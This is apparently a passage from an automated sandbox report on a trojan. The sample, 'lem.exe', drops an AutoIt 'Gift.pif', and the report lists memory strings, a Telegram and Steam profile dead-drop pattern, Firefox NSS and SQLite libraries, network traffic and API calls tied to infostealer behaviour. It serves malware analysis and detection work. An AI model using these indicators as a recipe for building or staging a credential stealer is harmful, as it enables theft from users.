                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/mobile
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/news/
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/points/shop/
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/stats/
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                        Source: FBAAAK.11.drString found in binary or memory: https://support.mozilla.org
                        Source: FBAAAK.11.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: FBAAAK.11.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/armad2a
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/armad2ahellosqls.dllsqlite3.dllIn
                        Source: Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, AFHDGD.11.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                        Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                        Source: Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, AFHDGD.11.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: https://www.digicert.com/CPS0
                        Source: DHCBGD.11.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: Gift.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/0
                        Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/06
                        Source: DHCBGD.11.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: FBAAAK.11.drString found in binary or memory: https://www.mozilla.org
                        Source: Gift.pif, 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                        Source: FBAAAK.11.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                        Source: Gift.pif, 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                        Source: FBAAAK.11.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                        Source: Gift.pif, 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                        Source: Gift.pif, 0000000B.00000003.2865855331.0000000012734000.00000004.00000800.00020000.00000000.sdmp, FBAAAK.11.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                        Source: Gift.pif, 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                        Source: FBAAAK.11.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: Gift.pif, 0000000B.00000003.2865855331.0000000012734000.00000004.00000800.00020000.00000000.sdmp, FBAAAK.11.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                        Source: Gift.pif, 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                        Source: Gift.pif, 0000000B.00000003.2865855331.0000000012734000.00000004.00000800.00020000.00000000.sdmp, FBAAAK.11.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                        Source: unknownHTTPS traffic detected: 104.102.49.249:443 -> 192.168.2.5:49712 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 188.245.87.202:443 -> 192.168.2.5:49713 version: TLS 1.2
                        Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00344830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00344830
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00344632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_00344632
                        Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0035D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_0035D164
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00334254: CreateFileW,DeviceIoControl,CloseHandle,11_2_00334254
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00328F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00328F2E
                        Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00335778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00335778
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\PartnersEdinburghJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\JustRunJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\StatutoryImJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\AcquireMotivationJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\RegulatedVerseJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\GenomeNeitherJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\DesireBattleJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\SympathySatisfiedJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\AnalogProcJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\QuestionsDeviationJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\SequenceKnewJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\WitnessesGeometryJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\EuroTechJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\ColorDrumsJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\ThrownJazzJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\ScreenMeetingsJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\CurvesPursuitJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\TracySemiconductorJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\IeeeEgyptJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\PreviousWearingJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\DressThicknessJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\MultipleSurroundingJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\TowersZoophiliaJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_0040497C0_2_0040497C
                        Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406ED20_2_00406ED2
                        Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004074BB0_2_004074BB
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002DB02011_2_002DB020
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002D94E011_2_002D94E0
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002D9C8011_2_002D9C80
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002F23F511_2_002F23F5
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0035840011_2_00358400
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0030650211_2_00306502
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0030265E11_2_0030265E
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002DE6F011_2_002DE6F0
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002F282A11_2_002F282A
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_003089BF11_2_003089BF
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00350A3A11_2_00350A3A
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00306A7411_2_00306A74
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002E0BE011_2_002E0BE0
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002FCD5111_2_002FCD51
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0032EDB211_2_0032EDB2
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00338E4411_2_00338E44
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00350EB711_2_00350EB7
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00306FE611_2_00306FE6
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002D32C211_2_002D32C2
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002F33B711_2_002F33B7
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002FF40911_2_002FF409
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002ED45D11_2_002ED45D
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002EF62811_2_002EF628
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002D166311_2_002D1663
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002DF6A011_2_002DF6A0
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002F16B411_2_002F16B4
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002F78C311_2_002F78C3
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002F1BA811_2_002F1BA8
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002FDBA511_2_002FDBA5
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00309CE511_2_00309CE5
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002D7CD711_2_002D7CD7
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002EDD2811_2_002EDD28
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002F1FC011_2_002F1FC0
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002FBFD611_2_002FBFD6
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: String function: 002F0D17 appears 70 times
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: String function: 002F8B30 appears 42 times
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: String function: 002E1A36 appears 34 times
                        Source: C:\Users\user\Desktop\lem.exeCode function: String function: 004062A3 appears 58 times
                        Source: lem.exeStatic PE information: invalid certificate
                        Source: lem.exe, 00000000.00000003.2031229309.000000000293B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs lem.exe
                        Source: lem.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: lem.exeStatic PE information: Section: .reloc ZLIB complexity 1.002685546875
                        Source: GDAAKK.11.drBinary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@27/66@3/3
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0033A6AD GetLastError,FormatMessageW,11_2_0033A6AD
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00328DE9 AdjustTokenPrivileges,CloseHandle,11_2_00328DE9
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00329399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00329399
                        Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00334148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,11_2_00334148
                        Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0033443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,11_2_0033443D
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199747278259[1].htmJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3500:120:WilError_03
                        Source: C:\Users\user\Desktop\lem.exeFile created: C:\Users\user\AppData\Local\Temp\nsbB483.tmpJump to behavior
                        Source: lem.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\SysWOW64\timeout.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Users\user\Desktop\lem.exeFile read: C:\Users\desktop.iniJump to behavior
